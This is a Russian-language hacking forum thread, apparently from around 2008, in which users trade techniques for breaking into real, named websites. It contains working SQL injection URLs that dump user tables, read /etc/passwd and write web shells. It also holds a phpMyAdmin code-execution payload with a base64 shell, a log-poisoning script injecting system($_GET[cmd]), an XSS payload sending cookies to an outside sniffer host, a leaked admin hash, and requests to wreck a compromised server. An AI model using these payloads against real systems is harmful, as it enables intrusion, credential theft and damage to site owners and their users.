так что эксплоит для второй ветки, видимо, выглядит несколько иначе, чем приведённый выше.... Кто-нить может помочь с этим?

P.S. http://www.the-wildcat.de/phpmyadmin-code-execution-vulnerability/ - вот тут все нюансы.

UPDATE

для второй ветки написано MySQL < 5 и Option NaturalOrder должна быть установлена. Что это за оция?


Коммент от товарища desTiny

видимо, нюансы возникли из-за коммента - /**
* apply limit and order manually now
* (caused by older MySQL < 5 or $GLOBALS['cfg']['NaturalOrder'])
*/

вот - /**
* if $GLOBALS['cfg']['NaturalOrder'] is enabled, we cannot use LIMIT
* cause MySQL does not support natural ordering, we have to do it afterward
*/

Интересен также код:

if ($GLOBALS['cfg']['NaturalOrder']) {
$limit = '';
} else {
if ($limit_count) {
$limit = ' LIMIT ' . $limit_count . ' OFFSET ' . $limit_offset;
}

$apply_limit_and_order_manual = false;
}



DesTiny (15:57:36 28/09/2008)
если оно установлено ИЛИ версия мускуля <=4 то сортировка происходит вручную

DesTiny (15:57:47 28/09/2008)
посредством создаваемой функции

me (15:58:03 28/09/2008)
то есть для исользования баги

me (15:58:16 28/09/2008)
сортировка должна осуществляться вручную

DesTiny (15:58:20 28/09/2008)
да

me (15:58:22 28/09/2008)
следовательно -

me (15:58:31 28/09/2008)
$GLOBALS['cfg']['NaturalOrder'] - должна быть установлена

me (15:58:33 28/09/2008)
или

me (15:58:38 28/09/2008)
MySQL < 5

Скажите пожалуйста вывод:
Warning: Smarty error: a_eshop_show_info: missing 'item' parameter in /home/hosting/******/_engine/lib/smarty/Smarty.class.php on line 1042

Это скуль? Что то уже 2ой день над ней парюсь и без результатно. Может эта какая либо ошибка в скрипте?

2 1ten0.0net1:

Посмотрев на исходник - вижу структуру:

$apply_limit_and_order_manual = true;

if (PMA_MYSQL_INT_VERSION >= 50002) {
...
if ($GLOBALS['cfg']['NaturalOrder']) {
...
} else {
...
$apply_limit_and_order_manual = false;
}
}else{
...
}
if ($apply_limit_and_order_manual) {

if ($GLOBALS['cfg']['NaturalOrder']) {
$sorter = 'strnatcasecmp';
} else {
$sorter = 'strcasecmp';
}

// produces f.e.:
// return -1 * strnatcasecmp($a["SCHEMA_TABLES"], $b["SCHEMA_TABLES"])
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';

usort($databases, create_function('$a, $b', $sort_function));
}

Если реально есть php-инжект, то MySQL<5 или $GLOBALS['cfg']['NaturalOrder'].

Тогда надо извращаться с
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);

Не имея всего скрипта, проверять не могу - но предполагаю, что надо что-то типа

$sort_by = SCHEMA_TABLES"], $b["SCHEMA_TABLES"])*(eval("print 'xek';")==1?1:0);//

Скажите пожалуйста вывод:
Warning: Smarty error: a_eshop_show_info: missing 'item' parameter in /home/hosting/******/_engine/lib/smarty/Smarty.class.php on line 1042

Это скуль? Что то уже 2ой день над ней парюсь и без результатно. Может эта какая либо ошибка в скрипте?


Это не скуль, а ошибка в отсутствии переменной item обработчика шаблонов Smarty. Лучше ответьте на вопрос выше)

1ten0.0net1, у меня версия phpMyAdmin 2.11.4, и бага отлично работает - создает копию config.inc.php в корне директории с именем config.txt. Проверь права и владельца апача и директории

ЗЫ. http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR passthru($_GET[ccmd]); //&sort_order=desc&token=[my_valid_token]&ccmd=ls
:)

ЗЗЫ. Заливка простого шелла
http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR file_put_contents('config.php',base64_decode('PD8g cGFzc3RocnUoJF9HRVRbY2NtZF0pOyA/Pg==')); //&sort_order=desc&token=[my_valid_token]

Можно ли узнать что за админка по url. Если кому то знакома сылка, подскажите плиз.
admin.php?pd=&7900&md=control_access&inst=&

Хм... скорее всего ид привязонно к ип !и подделов ид не получишь доступа! Есче вопросик а зачем ты заморачиваешься если у тебя есть доступ к базе ?

Нет доступа к админке.

а данные к админке есть в базе ? )) или file_priv ?

Кто сможет подсказать.
Есть папка на сайте ../forum/upload
по умолчанию она 403
но права на запись в неё есть через HTTP-PUT
как можно организовать туда заливку шелла?

гуглил сегодня весь день.
в итоге смог туда записывать текстоивки,картинки и html делал запись с помощью браузера Amaya а вот php никак не удаётся запихать(

И так вот сканил очередной сервер обнаружил там открытый порт 135 (RPC) сразу же не думая врубил эксплоит под этот порт.....
Выскочила надпись

Connected to shell...

Я обрадовался но.........
Что теперь делать???
Я в том смысле что тачка удаленная и мне нужно следуйщее
Создать пользователя(админа), узнать пароль от дефолтного админа (то есть каторый стоял до создания профиля моего тама, под каким именем заходит не знаю), рас***рить сервер(хз как), то есть сделать макс плохое ему можно даже чтобы железо полетело!

рас***рить сервер(хз как), то есть сделать макс плохое ему можно даже чтобы железо полетело!
Непохек, это глупо, мне жалко таких людей которые это делают

[Dezzter] может харе срать? а?
твое мнение не кому не интересно что тебе нравиться что тебе нравиться а что нет

[Dezzter] ГО МОДЕРУ В ЛИЧКУ СРАТЬ, МЕГО-ХАКЕР!

И так вот сканил очередной сервер обнаружил там открытый порт 135 (RPC) сразу же не думая врубил эксплоит под этот порт.....
Выскочила надпись

Connected to shell...

Я обрадовался но.........
Что теперь делать???
Я в том смысле что тачка удаленная и мне нужно следуйщее
Создать пользователя(админа), узнать пароль от дефолтного админа (то есть каторый стоял до создания профиля моего тама, под каким именем заходит не знаю), рас***рить сервер(хз как), то есть сделать макс плохое ему можно даже чтобы железо полетело!

если не ошибаюсь использовал kaht? если да, то у тебя все права. вперед и с песней.

Дело в том что я попытался юзать его но он не хочет токо RPC GUI v2 - r3L4x.exe конектиться к нему, но он ниче не делает а точнее я там пишу все равно не делает в cmd на удаленке

Ребят, подскажите куда копать...

есть типичный сайт, с типичным параметром id=1234...

' " экранируются слешем \'

order by, group by, limit проходят.

; - нет, сразу ругается SELECT * FROM objs WHERE id=-1 ... ;

пробовал union select 1,...100 (через софт) - не проходит.

Ещё из, возможно, интересного - структура построена на /?alias=section, при изменении section -- пустой экран.

у мя вот примерно такаяже проблема как у дизнта , я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :
http://avoreg.ru/pic_s/b2c6499060567ddbff7fc2e67c484d33.jpg (http://avoreg.ru/v.php?id=b2c6499060567ddbff7fc2e67c484d33)
но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?

warlok +500 не выполняються команды! ВОЗМУТИТЕЛЬНО!

Обновления может стоят... фиревол, антивирус...

вот етого я незнаю что у него там стоит))) но тип етот самоувереный болван)

а данные к админке есть в базе ? )) или file_priv ?

Фаил прив всяко нету,а пароли никто не может расшифровать пле).Да и потом,толку иметь логин пароль от админки,не имея доступа к админке ?

NEED HELP WITH THIS

/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,database(),12,13,14,15%20--

IT WORKS WILL

AFTER I DO WITH INFORMATION_SCHEMA.TABLES

/showdetials.php?id=53%20union%20select%201,2,3,4,5 ,6,7,8,9,10,concat(table_name,0x3e,column_name,0x3 e,table_schema)
,12,13,14,15%20from%20information_schema.columns%2 0WHERE%20column_name%20LIKE%20CHAR(37,112,97,115,1 15,37)--

NOTHING I DIDNT SEE THIS BEFORE SO PLS HELP

showdetials.php?id=53+union+select+1,2,3,4,5,6,7,8 ,9,10,UNHEX(HEX(concat(table_name,0x3e,column_name ,0x3e,table_schema))),12,13,14,15+from+information _schema.columns+WHERE+column_name+LIKE+CHAR(37,112 ,97,115,115,37)/*




13
course_enroll>course_enroll_pass>elearn

التاريخ : 8

13
dept_member>PASS>elearn

التاريخ : 8

13
members>PASS>elearn

...
...

;)

showdetials

U DID GOOGLE ON THIS

HAHA THANX MAN U REALY APRO

BUT IT APPEARS ON WHAT SOURCE OR WHAT

admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess

Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=

ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.

Вопрос для всех! Извените если пишу не по теме просто не знаю куда писать!

Мне взлломали контакт! Без мыла как это зделали,,,,???
Кто знает отпешите если есть пост кинте сылку!!!

admin_access
admin_groups
content_categories_est
content_categories_rus
content_links_eng
content_links_est
content_links_rus
content_objects_eng
content_objects_est
content_objects_rus
ctlg_projects
gallery
news_eng
news_est
news_rus
nlsbo_est
nlsbo_rus
nlsf_est
nlsf_rus
sets_languages
users_sess

Кто-нибудь знает,от какого-то это двига ? А то куча логинов/паролей,а толку никакого)).Сканеры директорий ничего не нашли,порты стандартные(21,22,80).Может пользовался ими кто.Не найти никак админку,ибо пути явно нестандартные... =_=

ЗЫ: В первом находятся логин/пароль,а в последнем - сессия.


Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!

я в локале нашол уязвимую тачку пробую запустить експлоит вроде все норм запускаеться :

http://avoreg.ru/pic_b/b2c6499060567ddbff7fc2e67c484d33.jpg

но как видно на скрине команды тупо не выполняються... искал я на ету тему в гугле инфу нашол скрин удачного пробивава етим сплоитом и там после WooT вылетала командная строка а тут нет... Как етого можно добиться?

ЗЫ

geforce просто человек собрал базу мыл (где присуствовало твое мыло) и просто в тупую перебирал эти мыла вконтакте на один пароль вот и попадаються такие

geforce просто человек собрал базу мыл (где присуствовало твое мыло) и просто в тупую перебирал эти мыла вконтакте на один пароль вот и попадаються такие

А чем переберал есть такая прога или это скрипт какойто! Если не секрет подскажи что где и как скачать!???

http://grabberz.com/showthread.php?t=7819

(сори если реклама)
а вообще юзай гугл по этому делу

(на сайте у них все надо сохранять в .pl формате и потом юзать как эксплоит)!

В общажной локалке стоит сайт на денвере (2-м),на самом сайте нашел пхп-инклуд и скуль. В скуле все что можно ввести гонится через addslashes (),это можно как-то обойти? что касается инклуда он походу локальный,что из него можно вытащить? Я им пытался инклудить файлы из папки mysql4 но отображаются крякозябры) можно через это все както вытащить базу или получить шел или хотябы листинг дерикторий???

bq1foe, поищи скрипт заливки какх нить файлов, например картинок, если найдёшь, вставляй в картинку шелл, заливай, инклудь

В общажной локалке стоит сайт на денвере (2-м),на самом сайте нашел пхп-инклуд и скуль. В скуле все что можно ввести гонится через addslashes (),это можно как-то обойти? что касается инклуда он походу локальный,что из него можно вытащить? Я им пытался инклудить файлы из папки mysql4 но отображаются крякозябры) можно через это все както вытащить базу или получить шел или хотябы листинг дерикторий???

попробуй длоги приинклудить с записанным шеллом, если нет залива.

В скуле чтобы обойти фильтр, нужон захексить или зачарить символы. НО шелл залить через скулю не удастся

один раз получалось инклудить логи, в основном 3 проблемы
1) их хер найдёшь
2) если найдёшь, то скорее всего не будет прав на чтение
3) если повезёт и буду права, то файл будет размером под 3 гига +))

Скрипт наверника самописный! А вобще скинь сылочку нада так посмотреть!

Ту же самую структуру я на десятках сайтах видел)

1) их хер найдёшь
2) если найдёшь, то скорее всего не будет прав на чтение
3) если повезёт и буду права, то файл будет размером под 3 гига +))
1) Денвер
2) Денвер
3) Общажная локалка

ну я какбэ говорил в большинстве случаев =\

один раз получалось инклудить логи, в основном 3 проблемы
1) их хер найдёшь
2) если найдёшь, то скорее всего не будет прав на чтение
3) если повезёт и буду права, то файл будет размером под 3 гига +))
3) в логи надо писать не весь шелл, а только код который будет подгружать код шелла в нужную диру. потом его и инклудить

С заливкой файлов облом.Скуль в принцепе тоже безполезна,т.к. пассов там нет, они хранятся хер знает где (где именно записано в конфиг.пхп((
А про то как в логи записать свой код можно по подробней?

Так я видать чего то не допонял) Сам access.log я нашел и успешно заинклудил но так и не понял чем мне он может помочь

Подставляй вместо своего юзер агента пхп код инклудящий шелл. Твой заход на сайт запишется в логи, и потом уже их инклудь. Самый простой вариант - скачай программу Minibrowser, там в настройках в поле для юзер агента впиши пхп код, и сделай несколько заходов с него на сайт.

Первые успехи

Если локальный шелл никаким образом залить нельзя, то отчего же не внедрить нужный код прямо в лог, а потом заинклудить его с помощью уже известной баги? Итак, сооружаем небольшой php-скрипт для отсылки нужного нам кода:

<?

$site='i.tjat.com'; //адрес сайта

$path='/'; //путь к уязвимому скрипту

$inject='<? system($_GET[cmd]) ?>'; //php-инъекция

$fp = fsockopen($site, 80, $errno, $errstr, 30))

$out = "GET $path HTTP/1.1\r\n";

0$out .= "Host: $site\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: $inject\r\n\r\n";

fwrite($fp, $out);

fclose($fp);

?>

Запустив этот скрипт у себя на локалхосте и убедившись в том, что он сработал, я соорудил ядовитую ссылку:

http://wap.tjat.com/?lang=ru/../../../../../../../../../../../../../usr/local/apache/logs/imode_icq.com-access_log

Перейдя по ней, я крупно обломался, поскольку на сервере был включен php safe_mode. Но, как ты догадываешься, дорогой читатель, это меня не остановило :).
http://www.xakep.ru/magazine/xa/101/086/1.asp

Попробывал.Ничего не вышло,поковырялся в логах, там походу агенты не сохраняются вобще.

помогите развить дальше
http://www.vodnik.info/article.php?aid=-1'+union+select+1,2,3,4,5,6,7,8,9+/*
с помощью такого запроса прочитад passwd http://www.vodnik.info/article.php?aid=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9+/*

конфиг апача - http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/etc/httpd/conf/httpd.conf%27),3,4,5,6,7,8,9+/*
в нем виртуальные хосты в них дырок найти не смог.

узнав пути расположения сайтов на серваке попытался прочитать страницу http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/home/vodnik/vodnik-www/login.php%27),3,4,5,6,7,8,9+/*
судя по исходному коду где то есть инклуды
include_once("includes.inc.php");
include_once("login_control.php");
как найти путь к ним?.. может я не то и нетам ищу?

frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)

frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)
я не про то что уязвимость - инклуды а про то можно ли их прочитать.. судя по всему в них валяются данные базы

frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.

frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.
по крайней мере через load_file они не читаются.. есть еще какие то способы?

frigid20, врятли =\ Щас поковыряю скулю, мож чего интересного найду

Ещё вопрос:

office_ausers

Встречал кто-нибудь такую ? Перепробывал уже во все формы вбивать оттуда пароли))

Поля:

1 : usr_id
2 : user_id
3 : usr_lname
4 : usr_fname
5 : usr_email
6 : usr_info
7 : usr_username
8 : usr_password
9 : usr_public
10 : usr_group

frigid20,

http://www.vodnik.info/article.php?aid=-1%27+union+select+1,concat_ws(0x3a,username,passwo rd),3,4,5,6,7,8,9+from+tbl_users/*

admin:7e94dd496a3e3cc1

http://www.vodnik.info/admin/

:)

2Велемир дык в чем проблема то состоит тебе форму для аута нужно что ли найти ? :) Ну тогда если можно то линк сюда или в ПМ ;)
2frigid20 у тебя ковычки не экраниються судя по запросу :) Залей через Into outfile шелл и будет тебе счастье )

2n0ne, спасибо
2MaSTeR GэN, на запрос вида http://www.vodnik.info/article.php?aid=-1'+select+'<? php system($cmd) ?>'+from+tbl_users+INTO+OUTFILE+'/home/vodnik/vodnik-www/yarobot.php'/* сайт зависает...

Интересуют уязвимомости и методы взлома Ftp, по возможности приводите ссылки, а то юзал поиск, поиск особых результатов не дал

Интересуют уязвимомости и методы взлома Ftp, по возможности приводите ссылки, а то юзал поиск, поиск особых результатов не дал

http://www.inattack.ru/article/97.html

frigid20, просто ты неправильно юзаешь.

http://www.vodnik.info/article.php?aid=-1%27+union+select+1,'%3C?%20echo%20%22asd%22;%20?% 3E',3,4,5,6,7,8,9+into+outfile+'/home/vodnik/vodnik-www/123.php'/*

Вот правильно. Тебе осталось найти папку с правами на запись.

frigid20, https://forum.antichat.ru/threadnav34338-1-10.html прочти.

Всвязи с какими ошибками JOOMLA выдаёт сообщение на заливку шелла вида .php.gif -

Фаил трататата не может быть показан,так как содержит ошибки.

Версия JOOMLA 1.0.11

Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.

PhpBB 3.0.1 перерыл всё могет кто подскажет что нить????

http://forum.tvingo.ru

Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.

Если через PHP include,то его я пока не нашёл.Load_File() не читает почему-то,хотя несколько условий соблюдаются:

1.Фаил расположен на сервере
2.Hex значения принимаются


Но вот насчёт третьего условия (права доступа к файлу) я сомневаюсь,так как при пхп инклуде и при лоад файле пользователи от разных приложений (я так думаю,но не факт,что это так)) ),ибо при пхп инклуде всё выходит.Запрет на load_file()...может,и действительно запрет,так как доказать я этого не смогу всвязи с отсутствием вывода ошибок.А так было бы высело почитать файлики:).На одном сервере так вообще были рутовые права,т.к. бд под рутом была,что достаточно редко бывает, а лоад файлом прочесть ничего не смог.Вот и облом:).Кто-то так пошутил нехорошо)))

Кстати,вопрос в студию,который меня очень долго мучает: От каких серверных(или Бог знает каких) настроек зависит вывод списка директорий с помощь load_file() ? Пару раз всего смог так наслаждаться прогулкой по серверу:(:(

Это капец! Здесь одни гуру сидят и про какойто phpBB 3.0.1 ничего сказать не могут!

Велемир, ты очень много всего сказал и из этого дельного - пара фраз)) Короче, load_file() может не работать из-за выключенного file_priv на пользователе из-под которого ты работаешь.

И ещё одно - load_file() вообще не исполняет php код. Так что шелл-картинка не заработает через load_file().

upd:

Чтоб узнать есть ли права на чтение файлов с помощью load_file() не обязательно иметь вывод ошибок. Тем более даже вывод ошибок ничего не даст, за редким исключением.

Надеюсь, на твои вопросы ответил, ибо вообще их не понял)

А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.

geforce,

http://milw0rm.com/
http://packetstormsecurity.net/
http://google.com/

з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31

how to inject this

i tried after

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7'&Itemid=31

and

http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31'

doesnt work is this filtered how to bybass

waitting.............................

geforce, тебе тут никто ничего не должен

Народ вот такая проблема
Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*

Дальше роем и находим таблицы
user
-user_name
-user_password
tbl_user
-u_username
-u_password
-u_email
punbb_users
-id
-username
-password
-email

составляем запросы


http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,u_username,u_password),8+from+tbl_user+li mit+1,1/*
и
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,password),8+from+punbb_users+lim it+1,1/*

Но сайт упорно не хочет показывать содержимое таблиц

что делать чтобы оно показало?

Там таблицы те лежат просто в другой БД
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,u_username,u_password),8+from+moxieforge. tbl_user+limit+1,1/*

А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.

Начнем с того что никакого мата вовсе и небыло! А для тугих задаю вопрос вновь, какие уязвим есть У phpBB 3.0.1 ??

з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(

Эт ты к чему говоришь? Всмысле тебе меня жаль?

geforce, тебе тут никто ничего не должен

Ты не знаешь должны мне здесь или нет по этому попрошу без своего трёх капеечного флуда по этой теме лучшеб подсказала!

Там таблицы те лежат просто в другой БД
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,u_username,u_password),8+from+moxieforge. tbl_user+limit+1,1/*

Попробу сначало посмотреть что там вобще имеется

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/

1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.

1)Для тугих будешь вопросы повторять в другом месте.
2)За это время уже и сам мог баги поискать. Или на других форумах.
3)Спайдер не девушка.

1) Меня спросили я ответил!
2) Поискал не беспокойся!
3) Учту! (Аватар интересный :D :D :D )

Попробу сначало посмотреть что там вобще имеется

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_ name,8+from+information_schema.tables/**/
А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем той таблицы, ты данных не получишь

А по твоему откуда Мистерео название таблиц чуть выше отписал? Но при твоем запросе выводятся все таблицы, к которым пользователь имеет доступ, но при этом не выводится название БД, вот и получается что, если какая-то из этих таблиц лежит не в той БД, что на данный момент выбрана, то без указания имени базы данных перед именем таблицы, ты данных не получишь

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,databa se(),8/**/

Название бд tinymce!

Название текущей БД tinymce, а БД где лежит tbl_user называется moxieforge

geforce, я эти ссылки дал тебе не просто так. Если есть сплойты в паблике, то они есть там.

Так вроде бы все хорошо но...
Хочется достать логин и пасс форума

Вот делаю запрос
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,password),8+from+moxieforge.punb b_users+limit+1,1/*
не проходит
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,password),8+from+tinymce.punbb_u sers+limit+1,1/*
Не проходит делаю запрос другой
http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,password),8+from+punbb_users+lim it+1,1/*
не проходит

Вопрос.
Где же может валятся таблица с юзверями форума?

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (table_name,0x3a,table_schema),8+from+information_ schema.tables/*
punbb_users:tinymce_punbb

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (table_name,0x3a,table_schema),8+from+information_ schema.tables/*
punbb_users:tinymce_punbb
Почему не работает???

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,user_password),8+from+tinymce.ti nymce_punbb/**/

Почему не работает???

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,user_password),8+from+tinymce.ti nymce_punbb/**/

Вот так наверное:

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat _ws(0x3a,username,password),8+from+tinymce_punbb.p unbb_users

punbb_users - таблица с пользователями
tinymce_punbb - БД в которой лежит эта таблица

имеется сайт с sql injection. если у пользователся нет file_priv и адрес админки невозможно найти, то вообще бесполезно что-то пытаться сделать?

к примеру хотел залишь шелл, но ведь нет прав на файлы у юзверя :(
тоесть load_file()
into dumpfile отказываются работать :(

у юзера есть права только на одну базу данных. к mysql.user доступа не имеет

dArKkNiGHt,

https://forum.antichat.ru/threadnav34338-1-10.html

Вот это попробуй. И поищи какой-нить форум, или гестбуку или хоть что-то, за что можно зацепица. И попробуй погуглить админку :)

Надеюсь, на твои вопросы ответил, ибо вообще их не понял)


Я не говорил,что лоад фаил должен исполнять пхп код(нафига?).Я просто не понял,какой ты именно инклуд имел(я знаю только PHP include bug),и параллельно задал вопрос про лоад фаил.При запросе file_priv выводит Y,то бишь есть,а файлы не читаются(ни один) с помощью лоад файла,вот и всё.А спросил потому,что встретился с таким только пару раз.

Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там :)

Народ,интересуют ВСЕ возможные способы поднятия прав на шелле (кроме убийства админа или насылки на него порчи/сглаза/привода гипнотизёра и прочих мелких шалостей).Особенно интересные:).Версия ядра Linux 2.6.15-51-server :):).Шеллом практически пользовался в *праздничное* время,следовательно,опыт имею минимальный.(Второй шелл заливаю,чего же вы хотели))) ).Выслушаю все ваши предложения,идеи и пожелания.А также ссылки.

ЗЫ: Забыл уточнить - шелл С99 2.0 :):).Вроде где-то валялась 2.4 в нэте,но это другая тема разговора :(:(:(

Велемир, ну, тогда, сложно так сказать. Надо смотреть сайты сами. Если интересно - постучи в асю или скинь линки в личку - посмотрим что там :)

Я бы и рад дать сайтег,но он не содержания аля пиво.ру ((.Придётся,видимо,разбират� �ся самому(((.Всё равно спасибо :)

Велемир, юзай сплойт под это ядро. Оно довольно старое. Можешь опять же списаца со мной в асе - помогу. Или юзай milw0rm.com и packetstormsecurity.net

з.ы. какой веб-шелл - значения не имеет. В любом случае для поднятия прав нужно ssh

ok guys im sorry for bad russians

but i need help pls

course_enroll>course_enroll_pass>elearn
dept_member>PASS>elearn
members>PASS>elearn
users>Password>elearn
course_enroll>course_enroll_pass>fopme
dept_member>PASS>fopme
members>PASS>fopme
users>Password>fopme
mdl_course>password>mis
mdl_course_request>password>mis
mdl_hotpot>password>mis
mdl_lesson>usepassword>mis
mdl_lesson>password>mis
mdl_lesson_default>usepassword>mis
mdl_lesson_default>password>mis
mdl_quiz>password>mis
mdl_user>password>mis
mdl_workshop>usepassword>mis
mdl_workshop>password>mis
course_enroll>course_enroll_pass>pharmacy
dept_member>PASS>pharmacy
faculty_users>Pass>pharmacy
members>PASS>pharmacy
users>Password>pharmacy
members>PASS>qaumed
members>PASS>qaumed_evaluation
faculty>password>scuws
faculty_copy>password>scuws
members>PASS>scuws
users>Password>scuws
mdl_course>password>test
mdl_course_request>password>test
mdl_exercise>usepassword>test
mdl_exercise>password>test
mdl_groups>password>test
mdl_hotpot>password>test
mdl_lesson>usepassword>test
mdl_lesson>password>test
mdl_lesson_default>usepassword>test
mdl_lesson_default>password>test
mdl_quiz>password>test
mdl_user>password>test
mdl_workshop>usepassword>test
mdl_workshop>password>test
membersxx>PASS>test
members>PASS>test

i got this info but i need to get table to search
what to use????????????????????????


waitting>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Как это можно использовать http://allsexcontact.ru:80/pages.php?id=<script>alert(39740,1099853472)</script>

google - > cookie & XSS

AHMED HASSAN
wtf? make sure u can write atleast some lang. that is understandable and try to explain exactly what u need! what table? u mean to search?

anyway if ur technological skillz are not enough developed to understand this, please read more of manual )

Nofear
http://allsexcontact.ru/pages.php?id=<script>img=new Image();img.src="http://sniffer.com/s.gif?"+document.cookie;</script>
например так

Велемир
metasploit?

а вот мои непохеки:

http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1%27
http://www.wildberries.ru/news/detail.aspx?ID=69%27
http://www.prazdnik.by/holidays/inter'
10к в сутки..)

sabe
--------------------
Именно сдесь скули нет:
http://www.gbcma.vic.gov.au/default.asp?ID=177&post=132'&tpl=news_full
А вообще там с фильтрацией проблемы можно поискать другой параметр. База Access
--------------------
Это 3 ветка сравни
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version( ),1,1)=3/*
и
http://www.nfvcb.gov.ng/aboutus.php?pagesectionid=1+and+substring(version( ),1,1)=3/*
Видишь "About us" справа там где ошибка появлялась
Или вот сдесь более наглядно:
http://www.nfvcb.gov.ng/home_innerpages.php?pageid=39+and+substring(versio n(),1,1)=3&pagesectionid=7
----------------------
Это не скуль
http://www.wildberries.ru/news/detail.aspx?ID=69%27
----------------------
Последняя: Портал работает на "Битрикс" можешь при желании поискать баги под неё :)

народ есть сайт со скулью
прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след.

метод Update
чтение файла
загрузка шелла

все это бесполезно так вот если еще варианты кроме как расш. хеша???

например подмена кук)
мб после залогинивание в куках передаётся хеш пароля
а так хз что ещё

diznt
php inj,mysql,xss

sabe ну эт я знаю а я говорю о sql иньекции

реверс ip - посмотреть мож еще есть ресурсы на том же сервере ...

diznt
разшифровать пасс от мускула)

xcedz
полезно, но иногда каждый сайт на серваке управляется под своим пользователем )

sabe боже упаси не думаешь совсем...


народ есть сайт со скулью
прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след.

метод Update
чтение файла
загрузка шелла

все это бесполезно так вот если еще варианты кроме как расш. хеша???

sabe боже упаси не думаешь совсем...


народ есть сайт со скулью
прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след.

метод Update
чтение файла
загрузка шелла

все это бесполезно так вот если еще варианты кроме как расш. хеша???
Реверс IP ...возможно там ещё не мало бажных сайтов...А там уже или Рутать-если получетца....или если доступен mysql.user пробывать подключиттца к бд, и подменить хешь на время....
Update это врятле..если только иньекция в апдайте.....
Загрузка шелла-если есть file_priv Y...И если не фильтруютца ' ...Если file_priv всё же есть...найди конфиг подключ к мускулю, и го на 3306 порт или исчи пхпмайадмин .....)

